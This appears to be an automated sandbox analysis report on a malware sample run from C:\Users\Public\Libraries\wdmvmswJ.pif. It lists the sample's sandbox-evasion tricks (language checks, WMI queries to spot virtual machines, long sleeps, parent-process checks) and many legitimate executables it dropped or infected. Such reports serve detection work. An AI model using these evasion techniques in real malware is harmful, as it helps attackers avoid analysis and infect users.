Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Contains functionality to behave differently if execute on a Russian/Kazak computer

Source: C:\Windows\System32\AppVClient.exe	Code function: 22_2_007252A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h]	22_2_007252A0
Source: C:\Windows\System32\FXSSVC.exe	Code function: 25_2_009452A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h]	25_2_009452A0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 28_2_022952A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h]	28_2_022952A0

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\Public\Libraries\wdmvmswJ.pif

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Memory allocated: 20CD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Memory allocated: 20FC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Memory allocated: 20D10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Memory allocated: 26770000 memory reserve \| memory write watch
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Memory allocated: 269E0000 memory reserve \| memory write watch
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Memory allocated: 26770000 memory reserve \| memory write watch
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Memory allocated: 1E800000 memory reserve \| memory write watch
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Memory allocated: 1ED40000 memory reserve \| memory write watch
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Memory allocated: 1E800000 memory reserve \| memory write watch

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Users\Public\Libraries\wdmvmswJ.pif

12_1_004019F0

Contains long sleeps (>= 3 min)

Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Window / User API: threadDelayed 5124	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Window / User API: threadDelayed 4310	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Window / User API: threadDelayed 484

Found dropped PE file which has not been started or loaded

Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Windows\System32\vds.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Windows Media Player\wmpnetwk.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\7-Zip\7z.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\7-Zip\7zG.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Windows\System32\msiexec.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Windows\System32\TieringEngineService.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\updater.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Dropped PE file which has not been started: C:\Windows\System32\sppsvc.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Windows\System32\wbem\WmiApSrv.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\7-Zip\7zFM.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Windows\System32\wbengine.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Windows\System32\VSSVC.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Windows\System32\SearchIndexer.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	Jump to dropped file
